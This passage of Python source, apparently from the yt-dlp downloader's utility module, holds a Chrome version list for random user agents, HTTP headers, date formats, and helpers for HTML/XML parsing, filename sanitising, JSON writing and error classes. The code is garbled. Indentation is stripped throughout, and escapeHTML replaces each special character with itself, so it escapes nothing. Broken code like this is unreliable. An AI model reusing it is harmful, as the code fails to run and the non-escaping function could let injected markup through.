'71.0.3578.20',
'70.0.3538.76',
'71.0.3578.19',
'70.0.3538.75',
'72.0.3588.1',
'72.0.3588.0',
'71.0.3578.18',
'70.0.3538.74',
'72.0.3586.2',
'72.0.3587.0',
'71.0.3578.17',
'70.0.3538.73',
'72.0.3586.1',
'72.0.3586.0',
'71.0.3578.16',
'70.0.3538.72',
'72.0.3585.1',
'72.0.3585.0',
'71.0.3578.15',
'70.0.3538.71',
'71.0.3578.14',
'72.0.3584.1',
'72.0.3584.0',
'71.0.3578.13',
'70.0.3538.70',
'72.0.3583.2',
'71.0.3578.12',
'72.0.3583.1',
'72.0.3583.0',
'71.0.3578.11',
'70.0.3538.69',
'71.0.3578.10',
'72.0.3582.0',
'72.0.3581.4',
'71.0.3578.9',
'70.0.3538.67',
'72.0.3581.3',
'72.0.3581.2',
'72.0.3581.1',
'72.0.3581.0',
'71.0.3578.8',
'70.0.3538.66',
'72.0.3580.1',
'72.0.3580.0',
'71.0.3578.7',
'70.0.3538.65',
'71.0.3578.6',
'72.0.3579.1',
'72.0.3579.0',
'71.0.3578.5',
'70.0.3538.64',
'71.0.3578.4',
'71.0.3578.3',
'71.0.3578.2',
'71.0.3578.1',
'71.0.3578.0',
'70.0.3538.63',
'69.0.3497.128',
'70.0.3538.62',
'70.0.3538.61',
'70.0.3538.60',
'70.0.3538.59',
'71.0.3577.1',
'71.0.3577.0',
'70.0.3538.58',
'69.0.3497.127',
'71.0.3576.2',
'71.0.3576.1',
'71.0.3576.0',
'70.0.3538.57',
'70.0.3538.56',
'71.0.3575.2',
'70.0.3538.55',
'69.0.3497.126',
'70.0.3538.54',
'71.0.3575.1',
'71.0.3575.0',
'71.0.3574.1',
'71.0.3574.0',
'70.0.3538.53',
'69.0.3497.125',
'70.0.3538.52',
'71.0.3573.1',
'71.0.3573.0',
'70.0.3538.51',
'69.0.3497.124',
'71.0.3572.1',
'71.0.3572.0',
'70.0.3538.50',
'69.0.3497.123',
'71.0.3571.2',
'70.0.3538.49',
'69.0.3497.122',
'71.0.3571.1',
'71.0.3571.0',
'70.0.3538.48',
'69.0.3497.121',
'71.0.3570.1',
'71.0.3570.0',
'70.0.3538.47',
'69.0.3497.120',
'71.0.3568.2',
'71.0.3569.1',
'71.0.3569.0',
'70.0.3538.46',
'69.0.3497.119',
'70.0.3538.45',
'71.0.3568.1',
'71.0.3568.0',
'70.0.3538.44',
'69.0.3497.118',
'70.0.3538.43',
'70.0.3538.42',
'71.0.3567.1',
'71.0.3567.0',
'70.0.3538.41',
'69.0.3497.117',
'71.0.3566.1',
'71.0.3566.0',
'70.0.3538.40',
'69.0.3497.116',
'71.0.3565.1',
'71.0.3565.0',
'70.0.3538.39',
'69.0.3497.115',
'71.0.3564.1',
'71.0.3564.0',
'70.0.3538.38',
'69.0.3497.114',
'71.0.3563.0',
'71.0.3562.2',
'70.0.3538.37',
'69.0.3497.113',
'70.0.3538.36',
'70.0.3538.35',
'71.0.3562.1',
'71.0.3562.0',
'70.0.3538.34',
'69.0.3497.112',
'70.0.3538.33',
'71.0.3561.1',
'71.0.3561.0',
'70.0.3538.32',
'69.0.3497.111',
'71.0.3559.6',
'71.0.3560.1',
'71.0.3560.0',
'71.0.3559.5',
'71.0.3559.4',
'70.0.3538.31',
'69.0.3497.110',
'71.0.3559.3',
'70.0.3538.30',
'69.0.3497.109',
'71.0.3559.2',
'71.0.3559.1',
'71.0.3559.0',
'70.0.3538.29',
'69.0.3497.108',
'71.0.3558.2',
'71.0.3558.1',
'71.0.3558.0',
'70.0.3538.28',
'69.0.3497.107',
'71.0.3557.2',
'71.0.3557.1',
'71.0.3557.0',
'70.0.3538.27',
'69.0.3497.106',
'71.0.3554.4',
'70.0.3538.26',
'71.0.3556.1',
'71.0.3556.0',
'70.0.3538.25',
'71.0.3554.3',
'69.0.3497.105',
'71.0.3554.2',
'70.0.3538.24',
'69.0.3497.104',
'71.0.3555.2',
'70.0.3538.23',
'71.0.3555.1',
'71.0.3555.0',
'70.0.3538.22',
'69.0.3497.103',
'71.0.3554.1',
'71.0.3554.0',
'70.0.3538.21',
'69.0.3497.102',
'71.0.3553.3',
'70.0.3538.20',
'69.0.3497.101',
'71.0.3553.2',
'69.0.3497.100',
'71.0.3553.1',
'71.0.3553.0',
'70.0.3538.19',
'69.0.3497.99',
'69.0.3497.98',
'69.0.3497.97',
'71.0.3552.6',
'71.0.3552.5',
'71.0.3552.4',
'71.0.3552.3',
'71.0.3552.2',
'71.0.3552.1',
'71.0.3552.0',
'70.0.3538.18',
'69.0.3497.96',
'71.0.3551.3',
'71.0.3551.2',
'71.0.3551.1',
'71.0.3551.0',
'70.0.3538.17',
'69.0.3497.95',
'71.0.3550.3',
'71.0.3550.2',
'71.0.3550.1',
'71.0.3550.0',
'70.0.3538.16',
'69.0.3497.94',
'71.0.3549.1',
'71.0.3549.0',
'70.0.3538.15',
'69.0.3497.93',
'69.0.3497.92',
'71.0.3548.1',
'71.0.3548.0',
'70.0.3538.14',
'69.0.3497.91',
'71.0.3547.1',
'71.0.3547.0',
'70.0.3538.13',
'69.0.3497.90',
'71.0.3546.2',
'69.0.3497.89',
'71.0.3546.1',
'71.0.3546.0',
'70.0.3538.12',
'69.0.3497.88',
'71.0.3545.4',
'71.0.3545.3',
'71.0.3545.2',
'71.0.3545.1',
'71.0.3545.0',
'70.0.3538.11',
'69.0.3497.87',
'71.0.3544.5',
'71.0.3544.4',
'71.0.3544.3',
'71.0.3544.2',
'71.0.3544.1',
'71.0.3544.0',
'69.0.3497.86',
'70.0.3538.10',
'69.0.3497.85',
'70.0.3538.9',
'69.0.3497.84',
'71.0.3543.4',
'70.0.3538.8',
'71.0.3543.3',
'71.0.3543.2',
'71.0.3543.1',
'71.0.3543.0',
'70.0.3538.7',
'69.0.3497.83',
'71.0.3542.2',
'71.0.3542.1',
'71.0.3542.0',
'70.0.3538.6',
'69.0.3497.82',
'69.0.3497.81',
'71.0.3541.1',
'71.0.3541.0',
'70.0.3538.5',
'69.0.3497.80',
'71.0.3540.1',
'71.0.3540.0',
'70.0.3538.4',
'69.0.3497.79',
'70.0.3538.3',
'71.0.3539.1',
'71.0.3539.0',
'69.0.3497.78',
'68.0.3440.134',
'69.0.3497.77',
'70.0.3538.2',
'70.0.3538.1',
'70.0.3538.0',
'69.0.3497.76',
'68.0.3440.133',
'69.0.3497.75',
'70.0.3537.2',
'70.0.3537.1',
'70.0.3537.0',
'69.0.3497.74',
'68.0.3440.132',
'70.0.3536.0',
'70.0.3535.5',
'70.0.3535.4',
'70.0.3535.3',
'69.0.3497.73',
'68.0.3440.131',
'70.0.3532.8',
'70.0.3532.7',
'69.0.3497.72',
'69.0.3497.71',
'70.0.3535.2',
'70.0.3535.1',
'70.0.3535.0',
'69.0.3497.70',
'68.0.3440.130',
'69.0.3497.69',
'68.0.3440.129',
'70.0.3534.4',
'70.0.3534.3',
'70.0.3534.2',
'70.0.3534.1',
'70.0.3534.0',
'69.0.3497.68',
'68.0.3440.128',
'70.0.3533.2',
'70.0.3533.1',
'70.0.3533.0',
'69.0.3497.67',
'68.0.3440.127',
'70.0.3532.6',
'70.0.3532.5',
'70.0.3532.4',
'69.0.3497.66',
'68.0.3440.126',
'70.0.3532.3',
'70.0.3532.2',
'70.0.3532.1',
'69.0.3497.60',
'69.0.3497.65',
'69.0.3497.64',
'70.0.3532.0',
'70.0.3531.0',
'70.0.3530.4',
'70.0.3530.3',
'70.0.3530.2',
'69.0.3497.58',
'68.0.3440.125',
'69.0.3497.57',
'69.0.3497.56',
'69.0.3497.55',
'69.0.3497.54',
'70.0.3530.1',
'70.0.3530.0',
'69.0.3497.53',
'68.0.3440.124',
'69.0.3497.52',
'70.0.3529.3',
'70.0.3529.2',
'70.0.3529.1',
'70.0.3529.0',
'69.0.3497.51',
'70.0.3528.4',
'68.0.3440.123',
'70.0.3528.3',
'70.0.3528.2',
'70.0.3528.1',
'70.0.3528.0',
'69.0.3497.50',
'68.0.3440.122',
'70.0.3527.1',
'70.0.3527.0',
'69.0.3497.49',
'68.0.3440.121',
'70.0.3526.1',
'70.0.3526.0',
'68.0.3440.120',
'69.0.3497.48',
'69.0.3497.47',
'68.0.3440.119',
'68.0.3440.118',
'70.0.3525.5',
'70.0.3525.4',
'70.0.3525.3',
'68.0.3440.117',
'69.0.3497.46',
'70.0.3525.2',
'70.0.3525.1',
'70.0.3525.0',
'69.0.3497.45',
'68.0.3440.116',
'70.0.3524.4',
'70.0.3524.3',
'69.0.3497.44',
'70.0.3524.2',
'70.0.3524.1',
'70.0.3524.0',
'70.0.3523.2',
'69.0.3497.43',
'68.0.3440.115',
'70.0.3505.9',
'69.0.3497.42',
'70.0.3505.8',
'70.0.3523.1',
'70.0.3523.0',
'69.0.3497.41',
'68.0.3440.114',
'70.0.3505.7',
'69.0.3497.40',
'70.0.3522.1',
'70.0.3522.0',
'70.0.3521.2',
'69.0.3497.39',
'68.0.3440.113',
'70.0.3505.6',
'70.0.3521.1',
'70.0.3521.0',
'69.0.3497.38',
'68.0.3440.112',
'70.0.3520.1',
'70.0.3520.0',
'69.0.3497.37',
'68.0.3440.111',
'70.0.3519.3',
'70.0.3519.2',
'70.0.3519.1',
'70.0.3519.0',
'69.0.3497.36',
'68.0.3440.110',
'70.0.3518.1',
'70.0.3518.0',
'69.0.3497.35',
'69.0.3497.34',
'68.0.3440.109',
'70.0.3517.1',
'70.0.3517.0',
'69.0.3497.33',
'68.0.3440.108',
'69.0.3497.32',
'70.0.3516.3',
'70.0.3516.2',
'70.0.3516.1',
'70.0.3516.0',
'69.0.3497.31',
'68.0.3440.107',
'70.0.3515.4',
'68.0.3440.106',
'70.0.3515.3',
'70.0.3515.2',
'70.0.3515.1',
'70.0.3515.0',
'69.0.3497.30',
'68.0.3440.105',
'68.0.3440.104',
'70.0.3514.2',
'70.0.3514.1',
'70.0.3514.0',
'69.0.3497.29',
'68.0.3440.103',
'70.0.3513.1',
'70.0.3513.0',
'69.0.3497.28',
)
return _USER_AGENT_TPL % random.choice(_CHROME_VERSIONS)
std_headers = {
'User-Agent': random_user_agent(),
'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-us,en;q=0.5',
}
USER_AGENTS = {
'Safari': 'Mozilla/5.0 (X11; Linux x86_64; rv:10.0) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
}
NO_DEFAULT = object()
ENGLISH_MONTH_NAMES = [
'January', 'February', 'March', 'April', 'May', 'June',
'July', 'August', 'September', 'October', 'November', 'December']
MONTH_NAMES = {
'en': ENGLISH_MONTH_NAMES,
'fr': [
'janvier', 'février', 'mars', 'avril', 'mai', 'juin',
'juillet', 'août', 'septembre', 'octobre', 'novembre', 'décembre'],
}
KNOWN_EXTENSIONS = (
'mp4', 'm4a', 'm4p', 'm4b', 'm4r', 'm4v', 'aac',
'flv', 'f4v', 'f4a', 'f4b',
'webm', 'ogg', 'ogv', 'oga', 'ogx', 'spx', 'opus',
'mkv', 'mka', 'mk3d',
'avi', 'divx',
'mov',
'asf', 'wmv', 'wma',
'3gp', '3g2',
'mp3',
'flac',
'ape',
'wav',
'f4f', 'f4m', 'm3u8', 'smil')
# needed for sanitizing filenames in restricted mode
ACCENT_CHARS = dict(zip('ÂÃÄÀÁÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖŐØŒÙÚÛÜŰÝÞßàáâãäåæçèéêëìíîïðñòóôõöőøœùúûüűýþÿ',
itertools.chain('AAAAAA', ['AE'], 'CEEEEIIIIDNOOOOOOO', ['OE'], 'UUUUUY', ['TH', 'ss'],
'aaaaaa', ['ae'], 'ceeeeiiiionooooooo', ['oe'], 'uuuuuy', ['th'], 'y')))
DATE_FORMATS = (
'%d %B %Y',
'%d %b %Y',
'%B %d %Y',
'%B %dst %Y',
'%B %dnd %Y',
'%B %drd %Y',
'%B %dth %Y',
'%b %d %Y',
'%b %dst %Y',
'%b %dnd %Y',
'%b %drd %Y',
'%b %dth %Y',
'%b %dst %Y %I:%M',
'%b %dnd %Y %I:%M',
'%b %drd %Y %I:%M',
'%b %dth %Y %I:%M',
'%Y %m %d',
'%Y-%m-%d',
'%Y/%m/%d',
'%Y/%m/%d %H:%M',
'%Y/%m/%d %H:%M:%S',
'%Y-%m-%d %H:%M',
'%Y-%m-%d %H:%M:%S',
'%Y-%m-%d %H:%M:%S.%f',
'%Y-%m-%d %H:%M:%S:%f',
'%d.%m.%Y %H:%M',
'%d.%m.%Y %H.%M',
'%Y-%m-%dT%H:%M:%SZ',
'%Y-%m-%dT%H:%M:%S.%fZ',
'%Y-%m-%dT%H:%M:%S.%f0Z',
'%Y-%m-%dT%H:%M:%S',
'%Y-%m-%dT%H:%M:%S.%f',
'%Y-%m-%dT%H:%M',
'%b %d %Y at %H:%M',
'%b %d %Y at %H:%M:%S',
'%B %d %Y at %H:%M',
'%B %d %Y at %H:%M:%S',
)
DATE_FORMATS_DAY_FIRST = list(DATE_FORMATS)
DATE_FORMATS_DAY_FIRST.extend([
'%d-%m-%Y',
'%d.%m.%Y',
'%d.%m.%y',
'%d/%m/%Y',
'%d/%m/%y',
'%d/%m/%Y %H:%M:%S',
])
DATE_FORMATS_MONTH_FIRST = list(DATE_FORMATS)
DATE_FORMATS_MONTH_FIRST.extend([
'%m-%d-%Y',
'%m.%d.%Y',
'%m/%d/%Y',
'%m/%d/%y',
'%m/%d/%Y %H:%M:%S',
])
PACKED_CODES_RE = r"}\('(.+)',(\d+),(\d+),'([^']+)'\.split\('\|'\)"
JSON_LD_RE = r'(?is)<script[^>]+type=(["\']?)application/ld\+json\1[^>]*>(?P<json_ld>.+?)</script>'
def preferredencoding():
"""Get preferred encoding.
Returns the best encoding scheme for the system, based on
locale.getpreferredencoding() and some further tweaks.
"""
try:
pref = locale.getpreferredencoding()
'TEST'.encode(pref)
except Exception:
pref = 'UTF-8'
return pref
def write_json_file(obj, fn):
""" Encode obj as JSON and write it to fn, atomically if possible """
fn = encodeFilename(fn)
if sys.version_info < (3, 0) and sys.platform != 'win32':
encoding = get_filesystem_encoding()
# os.path.basename returns a bytes object, but NamedTemporaryFile
# will fail if the filename contains non ascii characters unless we
# use a unicode object
path_basename = lambda f: os.path.basename(fn).decode(encoding)
# the same for os.path.dirname
path_dirname = lambda f: os.path.dirname(fn).decode(encoding)
else:
path_basename = os.path.basename
path_dirname = os.path.dirname
args = {
'suffix': '.tmp',
'prefix': path_basename(fn) + '.',
'dir': path_dirname(fn),
'delete': False,
}
# In Python 2.x, json.dump expects a bytestream.
# In Python 3.x, it writes to a character stream
if sys.version_info < (3, 0):
args['mode'] = 'wb'
else:
args.update({
'mode': 'w',
'encoding': 'utf-8',
})
tf = tempfile.NamedTemporaryFile(**compat_kwargs(args))
try:
with tf:
json.dump(obj, tf, default=repr)
if sys.platform == 'win32':
# Need to remove existing file on Windows, else os.rename raises
# WindowsError or FileExistsError.
try:
os.unlink(fn)
except OSError:
pass
try:
mask = os.umask(0)
os.umask(mask)
os.chmod(tf.name, 0o666 & ~mask)
except OSError:
pass
os.rename(tf.name, fn)
except Exception:
try:
os.remove(tf.name)
except OSError:
pass
raise
if sys.version_info >= (2, 7):
def find_xpath_attr(node, xpath, key, val=None):
""" Find the xpath xpath[@key=val] """
assert re.match(r'^[a-zA-Z_-]+$', key)
expr = xpath + ('[@%s]' % key if val is None else "[@%s='%s']" % (key, val))
return node.find(expr)
else:
def find_xpath_attr(node, xpath, key, val=None):
for f in node.findall(compat_xpath(xpath)):
if key not in f.attrib:
continue
if val is None or f.attrib.get(key) == val:
return f
return None
# On python2.6 the xml.etree.ElementTree.Element methods don't support
# the namespace parameter
def xpath_with_ns(path, ns_map):
components = [c.split(':') for c in path.split('/')]
replaced = []
for c in components:
if len(c) == 1:
replaced.append(c[0])
else:
ns, tag = c
replaced.append('{%s}%s' % (ns_map[ns], tag))
return '/'.join(replaced)
def xpath_element(node, xpath, name=None, fatal=False, default=NO_DEFAULT):
def _find_xpath(xpath):
return node.find(compat_xpath(xpath))
if isinstance(xpath, (str, compat_str)):
n = _find_xpath(xpath)
else:
for xp in xpath:
n = _find_xpath(xp)
if n is not None:
break
if n is None:
if default is not NO_DEFAULT:
return default
elif fatal:
name = xpath if name is None else name
raise ExtractorError('Could not find XML element %s' % name)
else:
return None
return n
def xpath_text(node, xpath, name=None, fatal=False, default=NO_DEFAULT):
n = xpath_element(node, xpath, name, fatal=fatal, default=default)
if n is None or n == default:
return n
if n.text is None:
if default is not NO_DEFAULT:
return default
elif fatal:
name = xpath if name is None else name
raise ExtractorError('Could not find XML element\'s text %s' % name)
else:
return None
return n.text
def xpath_attr(node, xpath, key, name=None, fatal=False, default=NO_DEFAULT):
n = find_xpath_attr(node, xpath, key)
if n is None:
if default is not NO_DEFAULT:
return default
elif fatal:
name = '%s[@%s]' % (xpath, key) if name is None else name
raise ExtractorError('Could not find XML attribute %s' % name)
else:
return None
return n.attrib[key]
def get_element_by_id(id, html):
"""Return the content of the tag with the specified ID in the passed HTML document"""
return get_element_by_attribute('id', id, html)
def get_element_by_class(class_name, html):
"""Return the content of the first tag with the specified class in the passed HTML document"""
retval = get_elements_by_class(class_name, html)
return retval[0] if retval else None
def get_element_by_attribute(attribute, value, html, escape_value=True):
retval = get_elements_by_attribute(attribute, value, html, escape_value)
return retval[0] if retval else None
def get_elements_by_class(class_name, html):
"""Return the content of all tags with the specified class in the passed HTML document as a list"""
return get_elements_by_attribute(
'class', r'[^\'"]*\b%s\b[^\'"]*' % re.escape(class_name),
html, escape_value=False)
def get_elements_by_attribute(attribute, value, html, escape_value=True):
"""Return the content of the tag with the specified attribute in the passed HTML document"""
value = re.escape(value) if escape_value else value
retlist = []
for m in re.finditer(r'''(?xs)
<([a-zA-Z0-9:._-]+)
(?:\s+[a-zA-Z0-9:._-]+(?:=[a-zA-Z0-9:._-]*|="[^"]*"|='[^']*'|))*?
\s+%s=['"]?%s['"]?
(?:\s+[a-zA-Z0-9:._-]+(?:=[a-zA-Z0-9:._-]*|="[^"]*"|='[^']*'|))*?
\s*>
(?P<content>.*?)
</\1>
''' % (re.escape(attribute), value), html):
res = m.group('content')
if res.startswith('"') or res.startswith("'"):
res = res[1:-1]
retlist.append(unescapeHTML(res))
return retlist
class HTMLAttributeParser(compat_HTMLParser):
"""Trivial HTML parser to gather the attributes for a single element"""
def __init__(self):
self.attrs = {}
compat_HTMLParser.__init__(self)
def handle_starttag(self, tag, attrs):
self.attrs = dict(attrs)
def extract_attributes(html_element):
"""Given a string for an HTML element such as
<el
a="foo" B="bar" c="&98;az" d=boz
empty= noval entity="&"
sq='"' dq="'"
>
Decode and return a dictionary of attributes.
{
'a': 'foo', 'b': 'bar', c: 'baz', d: 'boz',
'empty': '', 'noval': None, 'entity': '&',
'sq': '"', 'dq': '\''
}.
NB HTMLParser is stricter in Python 2.6 & 3.2 than in later versions,
but the cases in the unit test will work for all of 2.6, 2.7, 3.2-3.5.
"""
parser = HTMLAttributeParser()
try:
parser.feed(html_element)
parser.close()
# Older Python may throw HTMLParseError in case of malformed HTML
except compat_HTMLParseError:
pass
return parser.attrs
def clean_html(html):
"""Clean an HTML snippet into a readable string"""
if html is None: # Convenience for sanitizing descriptions etc.
return html
# Newline vs <br />
html = html.replace('\n', ' ')
html = re.sub(r'(?u)\s*<\s*br\s*/?\s*>\s*', '\n', html)
html = re.sub(r'(?u)<\s*/\s*p\s*>\s*<\s*p[^>]*>', '\n', html)
# Strip html tags
html = re.sub('<.*?>', '', html)
# Replace html entities
html = unescapeHTML(html)
return html.strip()
def sanitize_open(filename, open_mode):
"""Try to open the given filename, and slightly tweak it if this fails.
Attempts to open the given filename. If this fails, it tries to change
the filename slightly, step by step, until it's either able to open it
or it fails and raises a final exception, like the standard open()
function.
It returns the tuple (stream, definitive_file_name).
"""
try:
if filename == '-':
if sys.platform == 'win32':
import msvcrt
msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)
return (sys.stdout.buffer if hasattr(sys.stdout, 'buffer') else sys.stdout, filename)
stream = open(encodeFilename(filename), open_mode)
return (stream, filename)
except (IOError, OSError) as err:
if err.errno in (errno.EACCES,):
raise
# In case of error, try to remove win32 forbidden chars
alt_filename = sanitize_path(filename)
if alt_filename == filename:
raise
else:
# An exception here should be caught in the caller
stream = open(encodeFilename(alt_filename), open_mode)
return (stream, alt_filename)
def timeconvert(timestr):
"""Convert RFC 2822 defined time string into system timestamp"""
timestamp = None
timetuple = email.utils.parsedate_tz(timestr)
if timetuple is not None:
timestamp = email.utils.mktime_tz(timetuple)
return timestamp
def sanitize_filename(s, restricted=False, is_id=False):
"""Sanitizes a string so it could be used as part of a filename.
If restricted is set, use a stricter subset of allowed characters.
Set is_id if this is not an arbitrary string, but an ID that should be kept
if possible.
"""
def replace_insane(char):
if restricted and char in ACCENT_CHARS:
return ACCENT_CHARS[char]
if char == '?' or ord(char) < 32 or ord(char) == 127:
return ''
elif char == '"':
return '' if restricted else '\''
elif char == ':':
return '_-' if restricted else ' -'
elif char in '\\/|*<>':
return '_'
if restricted and (char in '!&\'()[]{}$;`^,#' or char.isspace()):
return '_'
if restricted and ord(char) > 127:
return '_'
return char
if s == '':
return ''
# Handle timestamps
s = re.sub(r'[0-9]+(?::[0-9]+)+', lambda m: m.group(0).replace(':', '_'), s)
result = ''.join(map(replace_insane, s))
if not is_id:
while '__' in result:
result = result.replace('__', '_')
result = result.strip('_')
# Common case of "Foreign band name - English song title"
if restricted and result.startswith('-_'):
result = result[2:]
if result.startswith('-'):
result = '_' + result[len('-'):]
result = result.lstrip('.')
if not result:
result = '_'
return result
def sanitize_path(s, force=False):
"""Sanitizes and normalizes path on Windows"""
if sys.platform == 'win32':
force = False
drive_or_unc, _ = os.path.splitdrive(s)
if sys.version_info < (2, 7) and not drive_or_unc:
drive_or_unc, _ = os.path.splitunc(s)
elif force:
drive_or_unc = ''
else:
return s
norm_path = os.path.normpath(remove_start(s, drive_or_unc)).split(os.path.sep)
if drive_or_unc:
norm_path.pop(0)
sanitized_path = [
path_part if path_part in ['.', '..'] else re.sub(r'(?:[/<>:"\|\\?\*]|[\s.]$)', '#', path_part)
for path_part in norm_path]
if drive_or_unc:
sanitized_path.insert(0, drive_or_unc + os.path.sep)
elif force and s[0] == os.path.sep:
sanitized_path.insert(0, os.path.sep)
return os.path.join(*sanitized_path)
def sanitize_url(url):
# Prepend protocol-less URLs with `http:` scheme in order to mitigate
# the number of unwanted failures due to missing protocol
if url.startswith('//'):
return 'http:%s' % url
# Fix some common typos seen so far
COMMON_TYPOS = (
# https://github.com/ytdl-org/youtube-dl/issues/15649
(r'^httpss://', r'https://'),
# https://bx1.be/lives/direct-tv/
(r'^rmtp([es]?)://', r'rtmp\1://'),
)
for mistake, fixup in COMMON_TYPOS:
if re.match(mistake, url):
return re.sub(mistake, fixup, url)
return url
def extract_basic_auth(url):
parts = compat_urlparse.urlsplit(url)
if parts.username is None:
return url, None
url = compat_urlparse.urlunsplit(parts._replace(netloc=(
parts.hostname if parts.port is None
else '%s:%d' % (parts.hostname, parts.port))))
auth_payload = base64.b64encode(
('%s:%s' % (parts.username, parts.password or '')).encode('utf-8'))
return url, 'Basic ' + auth_payload.decode('utf-8')
def sanitized_Request(url, *args, **kwargs):
url, auth_header = extract_basic_auth(escape_url(sanitize_url(url)))
if auth_header is not None:
headers = args[1] if len(args) >= 2 else kwargs.setdefault('headers', {})
headers['Authorization'] = auth_header
return compat_urllib_request.Request(url, *args, **kwargs)
def expand_path(s):
"""Expand shell variables and ~"""
return os.path.expandvars(compat_expanduser(s))
def orderedSet(iterable):
""" Remove all duplicates from the input iterable """
res = []
for el in iterable:
if el not in res:
res.append(el)
return res
def _htmlentity_transform(entity_with_semicolon):
"""Transforms an HTML entity to a character."""
entity = entity_with_semicolon[:-1]
# Known non-numeric HTML entity
if entity in compat_html_entities.name2codepoint:
return compat_chr(compat_html_entities.name2codepoint[entity])
# TODO: HTML5 allows entities without a semicolon. For example,
# 'Éric' should be decoded as 'Éric'.
if entity_with_semicolon in compat_html_entities_html5:
return compat_html_entities_html5[entity_with_semicolon]
mobj = re.match(r'#(x[0-9a-fA-F]+|[0-9]+)', entity)
if mobj is not None:
numstr = mobj.group(1)
if numstr.startswith('x'):
base = 16
numstr = '0%s' % numstr
else:
base = 10
# See https://github.com/ytdl-org/youtube-dl/issues/7518
try:
return compat_chr(int(numstr, base))
except ValueError:
pass
# Unknown entity in name, return its literal representation
return '&%s;' % entity
def unescapeHTML(s):
if s is None:
return None
assert type(s) == compat_str
return re.sub(
r'&([^&;]+;)', lambda m: _htmlentity_transform(m.group(1)), s)
def escapeHTML(text):
return (
text
.replace('&', '&')
.replace('<', '<')
.replace('>', '>')
.replace('"', '"')
.replace("'", ''')
)
def process_communicate_or_kill(p, *args, **kwargs):
try:
return p.communicate(*args, **kwargs)
except BaseException: # Including KeyboardInterrupt
p.kill()
p.wait()
raise
def get_subprocess_encoding():
if sys.platform == 'win32' and sys.getwindowsversion()[0] >= 5:
# For subprocess calls, encode with locale encoding
# Refer to http://stackoverflow.com/a/9951851/35070
encoding = preferredencoding()
else:
encoding = sys.getfilesystemencoding()
if encoding is None:
encoding = 'utf-8'
return encoding
def encodeFilename(s, for_subprocess=False):
"""
@param s The name of the file
"""
assert type(s) == compat_str
# Python 3 has a Unicode API
if sys.version_info >= (3, 0):
return s
# Pass '' directly to use Unicode APIs on Windows 2000 and up
# (Detecting Windows NT 4 is tricky because 'major >= 4' would
# match Windows 9x series as well. Besides, NT 4 is obsolete.)
if not for_subprocess and sys.platform == 'win32' and sys.getwindowsversion()[0] >= 5:
return s
# Jython assumes filenames are Unicode strings though reported as Python 2.x compatible
if sys.platform.startswith('java'):
return s
return s.encode(get_subprocess_encoding(), 'ignore')
def decodeFilename(b, for_subprocess=False):
if sys.version_info >= (3, 0):
return b
if not isinstance(b, bytes):
return b
return b.decode(get_subprocess_encoding(), 'ignore')
def encodeArgument(s):
if not isinstance(s, compat_str):
# Legacy code that uses byte strings
# Uncomment the following line after fixing all post processors
# assert False, 'Internal error: %r should be of type %r, is %r' % (s, compat_str, type(s))
s = s.decode('ascii')
return encodeFilename(s, True)
def decodeArgument(b):
return decodeFilename(b, True)
def decodeOption(optval):
if optval is None:
return optval
if isinstance(optval, bytes):
optval = optval.decode(preferredencoding())
assert isinstance(optval, compat_str)
return optval
def formatSeconds(secs, delim=':', msec=False):
if secs > 3600:
ret = '%d%s%02d%s%02d' % (secs // 3600, delim, (secs % 3600) // 60, delim, secs % 60)
elif secs > 60:
ret = '%d%s%02d' % (secs // 60, delim, secs % 60)
else:
ret = '%d' % secs
return '%s.%03d' % (ret, secs % 1) if msec else ret
def make_HTTPS_handler(params, **kwargs):
opts_no_check_certificate = params.get('nocheckcertificate', False)
if hasattr(ssl, 'create_default_context'): # Python >= 3.4 or 2.7.9
context = ssl.create_default_context(ssl.Purpose.SERVER_AUTH)
if opts_no_check_certificate:
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
try:
return YoutubeDLHTTPSHandler(params, context=context, **kwargs)
except TypeError:
# Python 2.7.8
# (create_default_context present but HTTPSHandler has no context=)
pass
if sys.version_info < (3, 2):
return YoutubeDLHTTPSHandler(params, **kwargs)
else: # Python < 3.4
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = (ssl.CERT_NONE
if opts_no_check_certificate
else ssl.CERT_REQUIRED)
context.set_default_verify_paths()
return YoutubeDLHTTPSHandler(params, context=context, **kwargs)
def bug_reports_message(before=';'):
if ytdl_is_updateable():
update_cmd = 'type yt-dlp -U to update'
else:
update_cmd = 'see https://github.com/yt-dlp/yt-dlp on how to update'
msg = 'please report this issue on https://github.com/yt-dlp/yt-dlp .'
msg += ' Make sure you are using the latest version; %s.' % update_cmd
msg += ' Be sure to call yt-dlp with the --verbose flag and include its complete output.'
before = before.rstrip()
if not before or before.endswith(('.', '!', '?')):
msg = msg[0].title() + msg[1:]
return (before + ' ' if before else '') + msg
class YoutubeDLError(Exception):
"""Base exception for YoutubeDL errors."""
pass
network_exceptions = [compat_urllib_error.URLError, compat_http_client.HTTPException, socket.error]
if hasattr(ssl, 'CertificateError'):
network_exceptions.append(ssl.CertificateError)
network_exceptions = tuple(network_exceptions)
class ExtractorError(YoutubeDLError):
"""Error during info extraction."""
def __init__(self, msg, tb=None, expected=False, cause=None, video_id=None):
""" tb, if given, is the original traceback (so that it can be printed out).
If expected is set, this is a normal error message and most likely not a bug in yt-dlp.
"""
if sys.exc_info()[0] in network_exceptions:
expected = True
if video_id is not None:
msg = video_id + ': ' + msg
if cause:
msg += ' (caused by %r)' % cause
if not expected:
msg += bug_reports_message()
super(ExtractorError, self).__init__(msg)
self.traceback = tb
self.exc_info = sys.exc_info() # preserve original exception
self.cause = cause
self.video_id = video_id
def format_traceback(self):
if self.traceback is None:
return None
return ''.join(traceback.format_tb(self.traceback))
class UnsupportedError(ExtractorError):
def __init__(self, url):
super(UnsupportedError, self).__init__(
'Unsupported URL: %s' % url, expected=True)
self.url = url
class RegexNotFoundError(ExtractorError):
"""Error when a regex didn't match"""
pass
class GeoRestrictedError(ExtractorError):
"""Geographic restriction Error exception.
This exception may be thrown when a video is not available from your
geographic location due to geographic restrictions imposed by a website.
"""
def __init__(self, msg, countries=None):
super(GeoRestrictedError, self).__init__(msg, expected=True)
self.msg = msg
self.countries = countries
class DownloadError(YoutubeDLError):
"""Download Error exception.
This exception may be thrown by FileDownloader objects if they are not
configured to continue on errors. They will contain the appropriate
error message.
"""
